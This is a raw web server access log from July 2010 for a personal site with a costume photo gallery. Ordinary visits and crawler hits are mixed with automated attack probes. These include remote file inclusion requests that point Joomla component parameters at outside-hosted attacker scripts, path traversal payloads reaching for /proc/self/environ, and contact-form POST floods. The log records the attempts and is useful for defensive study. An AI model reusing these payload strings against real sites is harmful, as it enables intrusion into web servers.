92.60.176.46 - - [04/Jul/2010:19:00:55 -0500] "GET /logs/access_log.1276128000/?option=com_webeecomment&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:00:55 -0500] "GET /?option=com_webeecomment&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:00:55 -0500] "GET /logs/?option=com_webeecomment&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:00:55 -0500] "GET /logs/access_log.1274572800/?option=com_webeecomment&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:00:56 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:01:11 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:01:11 -0500] "GET /logs/access_log.1277164800/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:01:53 -0500] "GET /logs/access_log.1276041600//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""MaMa CaSpEr"
207.46.199.182 - - [04/Jul/2010:19:02:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.201.199.193 - - [04/Jul/2010:19:03:52 -0500] "GET //protection.php?siteurl=http://www.members.lycos.co.uk/m4ck0/Ok/id.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
193.201.199.193 - - [04/Jul/2010:19:03:52 -0500] "GET /logs//protection.php?siteurl=http://www.members.lycos.co.uk/m4ck0/Ok/id.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
193.201.199.193 - - [04/Jul/2010:19:03:52 -0500] "GET /logs/access_log.1275264000%20%20//protection.php?siteurl=http://www.members.lycos.co.uk/m4ck0/Ok/id.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.189.179.214 - - [04/Jul/2010:19:05:06 -0500] "GET /logs/access_log.1276214400%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
83.170.102.253 - - [04/Jul/2010:19:06:04 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
81.201.128.67 - - [04/Jul/2010:19:06:22 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
92.60.176.46 - - [04/Jul/2010:19:07:28 -0500] "GET /logs/access_log.1276041600/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
124.254.77.243 - - [04/Jul/2010:19:07:44 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:07:44 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.35.101.154 - - [04/Jul/2010:19:10:17 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://ru.wikipedia.org/wiki/%D0%9D%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9_%D0%BA%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:10:20 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:10:20 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:10:20 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:10:21 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:10:27 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:10:40 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
83.170.102.253 - - [04/Jul/2010:19:10:57 -0500] "GET /logs/access_log.1277424000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
83.170.102.253 - - [04/Jul/2010:19:10:58 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
83.170.102.253 - - [04/Jul/2010:19:10:58 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
92.60.176.46 - - [04/Jul/2010:19:11:10 -0500] "GET //?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:11:11 -0500] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12140 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:11:11 -0500] "GET /logs/access_log.1277164800%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-""MaMa CaSpEr"
83.170.102.253 - - [04/Jul/2010:19:11:12 -0500] "GET /logs/access_log.1276905600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
81.201.128.67 - - [04/Jul/2010:19:11:34 -0500] "GET /logs/access_log.1277424000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
81.201.128.67 - - [04/Jul/2010:19:11:35 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
81.201.128.67 - - [04/Jul/2010:19:11:35 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
81.201.128.67 - - [04/Jul/2010:19:11:52 -0500] "GET /logs/access_log.1276905600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
88.35.101.154 - - [04/Jul/2010:19:12:15 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2938 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:15 -0500] "GET /costume/costume75%20copy.JPG HTTP/1.0" 200 17209 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:15 -0500] "GET /costume/costume73%20copy.JPG HTTP/1.0" 200 17492 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:15 -0500] "GET /costume/costume74%20copy.JPG HTTP/1.0" 200 17534 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume76%20copy.JPG HTTP/1.0" 200 16386 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume77%20copy.JPG HTTP/1.0" 200 16029 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume78%20copy.JPG HTTP/1.0" 200 15860 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume79%20copy.JPG HTTP/1.0" 200 19168 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume81%20copy.JPG HTTP/1.0" 200 18119 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.0" 200 16328 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.0" 200 15963 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:16 -0500] "GET /costume/costume80.JPG HTTP/1.0" 200 67426 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:17 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.0" 200 15105 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:26 -0500] "GET /costume/cd-page1.htm HTTP/1.0" 200 1189 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
88.35.101.154 - - [04/Jul/2010:19:12:27 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.0" 200 155727 "http://tomdolan.pconline.com/costume/cd-page1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
124.254.77.243 - - [04/Jul/2010:19:13:05 -0500] "GET /logs/access_log.1276905600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:13:05 -0500] "GET /logs/access_log.1276905600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:13:05 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:13:05 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:13:05 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:13:06 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:13:16 -0500] "GET /logs/access_log.1276646400/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:13:16 -0500] "GET /logs/access_log.1276646400/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.60.176.46 - - [04/Jul/2010:19:14:16 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 327 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:14:16 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [04/Jul/2010:19:14:17 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
124.254.77.243 - - [04/Jul/2010:19:15:03 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:15:03 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [04/Jul/2010:19:17:08 -0500] "GET /logs/access_log.1220054400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [04/Jul/2010:19:34:08 -0500] "GET /logs/access_log.1223683200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.254.77.243 - - [04/Jul/2010:19:37:47 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:37:47 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:37:47 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:43:14 -0500] "GET /firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 360 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:43:14 -0500] "GET /firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 360 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:43:16 -0500] "GET /firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 360 "-""libwww-perl/5.805"
207.46.204.181 - - [04/Jul/2010:19:44:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.181 - - [04/Jul/2010:19:45:03 -0500] "GET /logs/access_log.1165104000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.254.77.243 - - [04/Jul/2010:19:45:52 -0500] "GET /logs/access_log.1275782400/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:45:53 -0500] "GET /firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 360 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:45:53 -0500] "GET /logs/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 365 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:45:55 -0500] "GET /logs/access_log.1276128000/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:45:58 -0500] "GET /logs/access_log.1275782400/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:45:58 -0500] "GET /firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 360 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:45:58 -0500] "GET /logs/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 365 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:45:59 -0500] "GET /logs/access_log.1276128000/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:46:06 -0500] "GET /logs/access_log.1275782400/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:46:06 -0500] "GET /firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 360 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:46:07 -0500] "GET /logs/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 365 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:46:09 -0500] "GET /logs/access_log.1276128000/firstvisit.php../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:19:47:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.152.109.1 - - [04/Jul/2010:19:47:24 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
89.152.109.1 - - [04/Jul/2010:19:47:24 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
89.152.109.1 - - [04/Jul/2010:19:47:24 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
116.50.209.67 - - [04/Jul/2010:19:47:28 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.com.ph/search?q=costumes+different+nations&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:47:29 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:47:29 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:47:35 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:47:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:47:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:47:53 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
124.254.77.243 - - [04/Jul/2010:19:47:55 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:47:56 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.254.77.243 - - [04/Jul/2010:19:47:56 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
116.50.209.67 - - [04/Jul/2010:19:47:59 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:48:01 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
116.50.209.67 - - [04/Jul/2010:19:48:02 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
